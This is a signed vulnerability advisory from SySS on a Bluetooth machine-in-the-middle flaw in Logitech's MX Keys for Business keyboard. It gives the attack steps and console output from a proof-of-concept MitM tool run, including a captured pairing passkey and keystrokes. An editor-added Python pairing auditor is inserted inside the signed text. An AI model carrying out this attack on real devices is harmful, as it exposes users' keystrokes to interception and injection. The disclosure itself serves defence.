-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2024-084
Product:                   MX Keys for Business
Manufacturer:              Logitech
Affected Version(s):       Firmware Version RBK81.01_0015
Tested Version(s):         Firmware Version RBK81.01_0015
Vulnerability Type:        Channel Accessible by Non-Endpoint
                           (Machine-in-the-Middle, CWE-300)
Risk Level:                High
Solution Status:           Open
Manufacturer Notification: 2024-09-25
Solution Date:             -
Public Disclosure:         2024-12-10
CVE Reference:             Not yet assigned
Author of Advisory:        Pascal Rockenstiehl (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

MX Keys for Business is a wireless keyboard from Logitech that uses a
proprietary protocol called Logi Bolt, which is based on Bluetooth Low
Energy (BLE).

The manufacturer describes the product as follows (see [1]):

"MX Keys for Business features Logi Bolt wireless technology, engineered
to conquer IT challenges that can arise with both in-office and remote
users. Delivering cross-platform compatibility and reliable wireless
connections — even in congested wireless environments. Fully encrypted
and FIPS secure when paired with a Logi Bolt USB receiver."

Because the keyboard does not enforce any form of authentication during
pairing, MX Keys for Business is vulnerable to machine-in-the-middle
(MitM) attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

SySS GmbH discovered that the keyboard does not enforce any form of
authentication when a central device pairs with it.

When a central device whose IO capabilities are NoInputNoOutput tries to
pair with the keyboard, Just Works is selected as the key generation
method, which provides no authentication. Once the pairing process has
finished, the central device can subscribe to the HID characteristics
and is notified of every keystroke typed.

This behavior allows an attacker to perform a MitM attack in the
following manner:

1. The attacker detects the advertising packets of the keyboard.

2. The attacker pairs with the keyboard as described above.

3. The attacker clones the keyboard and starts sending advertising
   packets.

4. On the incoming pairing request from the victim's central device, the
   attacker and the central device start a normal pairing using passkey
   entry. The victim's central device now displays a six-digit passkey.

5. The victim sees the displayed passkey and enters the six-digit number
   on the keyboard, unaware of the attacker. Since the keyboard is
   already connected to the attacker, the keystrokes the victim performs
   to authenticate the keyboard are sent to the attacker as normal
   keystrokes.

6. The attacker, now in possession of the passkey, can complete the
   pairing between the fake keyboard and the victim's central device.

The attacker is now in a MitM position, able to see unencrypted
keystrokes and inject their own, all while forwarding every packet
between the victim's keyboard and the central device to stay undetected.
Therefore, this vulnerability compromises the confidentiality,
integrity, and availability of the communication between the keyboard
and the central device.

There are two ways to connect the keyboard to a computer:

1. Directly over BLE (if the computer is capable)

2. Over a special USB dongle from Logitech which uses the Logi Bolt
   protocol

This MitM attack is possible in both scenarios, but it can only be
executed successfully when an initial pairing between the keyboard and a
non-bonded device is performed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

To demonstrate the described MitM attack, Pascal Rockenstiehl developed
a sample BLE MitM software tool which executes the attack against a
victim keyboard with a pre-configured device address.
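The pairing-method selection explained in the Vulnerability Details above can be checked mechanically, which is how a defender audits a peripheral for this class of issue. The following Python example is added by the editor; it is not part of the SySS advisory nor of the PoC tool. It decodes the keyboard's ADV_IND payload and the SMP Pairing Request/Response parameters quoted in the console output below, applies the IO-capability rules of the Bluetooth Core Specification (Vol 3, Part H, 2.3.5.1), and reports whether a device that asked for MITM protection ended up with Just Works, a pairing that a conforming device is expected to refuse with Pairing Failed (reason "Authentication Requirements"). The advertisement bytes are copied from the output; the two 7-byte SMP PDUs are reconstructed from the logged field values (io=0x3/0x2, auth=0x1d, keysize=16, key distribution 0x3/0x3 and 0x2/0x3) and are therefore constructed samples, as are the function names.

```python
# Added example (not part of the advisory): decode BLE advertisement and SMP
# pairing parameters and derive the resulting pairing method.

# SMP IO capability encodings (Core Spec Vol 3, Part H, 3.5.1)
IO_CAPS = {0: "DisplayOnly", 1: "DisplayYesNo", 2: "KeyboardOnly",
           3: "NoInputNoOutput", 4: "KeyboardDisplay"}

# AuthReq flag bits (bits 0-1 are the bonding flags)
AUTH_MITM = 0x04
AUTH_SC = 0x08
AUTH_KEYPRESS = 0x10

HID_SERVICE_UUID = 0x1812        # Human Interface Device service
APPEARANCE_KEYBOARD = 0x03C1     # GAP appearance "Keyboard"


def parse_adv_data(hex_data: str) -> dict:
    """Split an advertising / scan-response payload into its AD structures."""
    raw = bytes.fromhex(hex_data)
    fields: dict = {}
    i = 0
    while i < len(raw):
        length = raw[i]
        if length == 0:
            break
        ad_type = raw[i + 1]
        payload = raw[i + 2:i + 1 + length]
        i += 1 + length
        if ad_type == 0x01:                       # Flags
            fields["flags"] = payload[0]
        elif ad_type in (0x02, 0x03):             # 16-bit service UUIDs
            fields["services"] = [int.from_bytes(payload[j:j + 2], "little")
                                  for j in range(0, len(payload), 2)]
        elif ad_type in (0x08, 0x09):             # shortened / complete name
            fields["name"] = payload.decode("utf-8", "replace")
        elif ad_type == 0x19:                     # Appearance
            fields["appearance"] = int.from_bytes(payload, "little")
        elif ad_type == 0xFF:                     # Manufacturer specific data
            fields["manufacturer_data"] = payload.hex()
    return fields


def looks_like_hid_keyboard(fields: dict) -> bool:
    return (HID_SERVICE_UUID in fields.get("services", [])
            and fields.get("appearance") == APPEARANCE_KEYBOARD)


def parse_smp_pairing_pdu(hex_pdu: str) -> dict:
    """Decode a 7-byte SMP Pairing Request (0x01) or Pairing Response (0x02)."""
    raw = bytes.fromhex(hex_pdu)
    if len(raw) != 7 or raw[0] not in (0x01, 0x02):
        raise ValueError("not an SMP pairing request/response PDU")
    code, io_cap, oob, auth, max_key, _init_kd, _resp_kd = raw
    return {
        "type": "request" if code == 0x01 else "response",
        "io": IO_CAPS.get(io_cap, f"reserved(0x{io_cap:02x})"),
        "oob": oob == 0x01,
        "bonding": bool(auth & 0x03),
        "mitm": bool(auth & AUTH_MITM),
        "sc": bool(auth & AUTH_SC),
        "keypress": bool(auth & AUTH_KEYPRESS),
        "max_key_size": max_key,
    }


def select_pairing_method(req: dict, rsp: dict) -> str:
    """Key generation method per Core Spec Vol 3, Part H, 2.3.5.1."""
    sc = req["sc"] and rsp["sc"]                  # LE Secure Connections only if both set it
    if (sc and (req["oob"] or rsp["oob"])) or (not sc and req["oob"] and rsp["oob"]):
        return "Out of Band"
    if not (req["mitm"] or rsp["mitm"]):
        return "Just Works"                       # IO capabilities are ignored
    init_io, resp_io = req["io"], rsp["io"]
    if "NoInputNoOutput" in (init_io, resp_io):
        return "Just Works"                       # the case in this advisory
    displays = {"DisplayOnly", "DisplayYesNo"}
    if init_io in displays and resp_io in displays:
        if sc and init_io == resp_io == "DisplayYesNo":
            return "Numeric Comparison"
        return "Just Works"
    if sc and {init_io, resp_io} <= {"DisplayYesNo", "KeyboardDisplay"}:
        return "Numeric Comparison"
    return "Passkey Entry"


def audit_pairing(req: dict, rsp: dict) -> dict:
    """Flag a pairing whose method cannot satisfy the requested MITM protection."""
    method = select_pairing_method(req, rsp)
    mitm_wanted = req["mitm"] or rsp["mitm"]
    return {"method": method,
            "authenticated": method != "Just Works",
            "should_reject": mitm_wanted and method == "Just Works"}


# Advertisement copied from the PoC output; SMP PDUs constructed from the logged fields.
ADV_IND = "0201050319c1030503121872fd0a084d58204b455953204206ff0600030080"
PAIRING_REQ = "0103001d100303"   # central: NoInputNoOutput, bonding|MITM|SC|keypress
PAIRING_RSP = "0202001d100203"   # keyboard: KeyboardOnly, same AuthReq

if __name__ == "__main__":
    adv = parse_adv_data(ADV_IND)
    print(adv["name"], looks_like_hid_keyboard(adv))
    print(audit_pairing(parse_smp_pairing_pdu(PAIRING_REQ),
                        parse_smp_pairing_pdu(PAIRING_RSP)))
```

Run against the advisory's values, the audit reports method "Just Works" with should_reject set: both sides asked for MITM protection (AuthReq 0x1d), yet the initiator's NoInputNoOutput capability forces Just Works, and the log shows the keyboard completing that pairing rather than refusing it. Swapping the initiator's capability for DisplayYesNo yields Passkey Entry, which is the path a legitimate host with a screen takes and the one the MitM later impersonates.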
The following lines show relevant parts of the attacker console output:

(venv) pascal@pascal:~/Desktop/extended-mirrage/mirage$ sudo venv/bin/mirage ble_sc_mitm INTERFACE1=hci1 INTERFACE2=hci0 ADVERTISING_STRATEGY=preconnect CONNECTION_TYPE=random SCENARIO=ble_hid_mitm DUCKYSCRIPT=duckyscript.txt TARGET=D5:BB:76:E9:2F:AA
[SUCCESS] [13:33:17.946793] Entering SCAN stage ...
[INFO] [13:33:17.958615] << BLE - Advertisement Packet | type=ADV_IND | addr=D5:BB:76:E9:2F:AA | data=0201050319c1030503121872fd0a084d58204b455953204206ff0600030080 >>
[INFO] [13:33:17.960012] << BLE - Advertisement Packet | type=SCAN_RSP | addr=D5:BB:76:E9:2F:AA | data=0a094d58204b45595320420b1672fd10010180b3010100020a04 >>
[SUCCESS] [13:33:17.960213] Entering CLONE stage ...
[INFO] [13:33:17.962807] Changing HCI Device (hci0) Random Address to : D5:BB:76:E9:2F:AA
[INFO] [13:33:17.974031] Connecting to slave D5:BB:76:E9:2F:AA...
[SUCCESS] [13:33:18.174431] Connected on slave : D5:BB:76:E9:2F:AA
[INFO] [13:33:18.175654] << BLE - Pairing Request Packet | outOfBand=no | inputOutputCapability=0x3 | authentication=0x1d | maxKeySize=16 | initiatorKeyDistribution=0x3 | responderKeyDistribution=0x3 >>
[SUCCESS] [13:33:18.178032] Started Advertising. Entering WAIT_CONNECTION stage ...
[INFO] [13:33:18.347041] << BLE - Pairing Response Packet | outOfBand=no | inputOutputCapability=0x2 | authentication=0x1d | maxKeySize=16 | initiatorKeyDistribution=0x2 | responderKeyDistribution=0x3 >>
...
[INFO] [13:33:19.047399] Slave pairing finished
[SUCCESS] [13:33:22.107479] Master connected : FD:02:62:46:53:C5
...
[INFO] [13:33:24.392071] Expecting victim to input passkey...
[SUCCESS] [13:33:26.366697] Keypress detected: 7(numpad)
[SUCCESS] [13:33:26.841762] Keypress detected: 9(numpad)
[SUCCESS] [13:33:27.541463] Keypress detected: 6(numpad)
[SUCCESS] [13:33:27.791397] Keypress detected: 5(numpad)
[SUCCESS] [13:33:28.441406] Keypress detected: 2(numpad)
[SUCCESS] [13:33:28.966535] Keypress detected: 0(numpad)
[SUCCESS] [13:33:29.591355] Keypress detected: ENTER(numpad)
[SUCCESS] [13:33:29.591491] the user entered the passcode: 796520
...
[INFO] [13:33:30.570086] Master pairing finished
[SUCCESS] [13:33:30.570222] Entering ACTIVE_MITM stage ...
...
[SUCCESS] [13:33:45.774723] Keypress detected: a
[SUCCESS] [13:33:46.024752] Keypress detected: b

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

SySS GmbH is currently not aware of a security fix for the described
issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-09-25: Vulnerability reported to manufacturer
2024-09-25: Manufacturer acknowledges receipt of security advisory
2024-09-30: E-mail to manufacturer concerning status update
2024-09-30: Received current status from manufacturer
2024-11-26: E-mail to manufacturer concerning status update
2024-12-10: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for MX Keys for Business
    http://www.logitech.com/en-us/product/mx-keys-for-business
[2] SySS Security Advisory SYSS-2024-084
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-084.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Pascal Rockenstiehl of SySS
GmbH.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: http://creativecommons.org/licenses/by/4.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE0fCgNfBs5nXNuQUU2aS/ajStTasFAmdW7I8ACgkQ2aS/ajSt
Tassuw//TUPiORLVEjg+1p5jYtYFGrArRgKa6dnpPf5ed5nn8AtQhVSvH7+UmnaX
IAapDCqgMi9N2MX47lFNs6ugP2SHMDHkmNys2ABvIy0D+YqGtvq3aOv/dOFny2DO
yab/ILmazaSpiTORp9N83OBQGKynlw2TCFz13Uua0Lj5cFvBKQxjlVEvRc30Idna
VyH9OiewCpq/AycXFr/H9Zi26PKrPn+evARxCIXbMoqcNQqdOIhUQdEuk/SsINwO
UAmX5NQNiASpU/HKLHMn9Df0zhGdlpedF5b5GjJE7QJQmm1/EBuT0QBmYGeh+NzZ
TC+lNTS9OP1yzoB3ZMbF2sIBKC0+SkNXsZul/IqStkns3llUlpLCi5tJD2IBhmWx
aNQ17csO6Sk1zZxtfF7OJMOFTUplIn138u9cYGrDYhJ04SqvtSVru0sQwrKs35Vh
NUHXyqL92t3G/JL8ImK0IkqwW1Rg7h9/kwrj5q0U/Vq5SFWSPBA1D9xqYowBYghy
owA0d39dYA5FCKwZLSfk3iX/14PnEuV+aZPQBUqn4E8Q1BHTxavXkCb92YF206vb
9i6BHKLsVDaJbM30AvmK4a/gXgFZTRlypoW64Hj/nmLK1IhzlEDNfMfBORc+1BfX
ToiO+e2QhIrmaf365oJ+HfTs556C+M+g5JRO+jsbjfwEoXTTB20=
=d2xx
-----END PGP SIGNATURE-----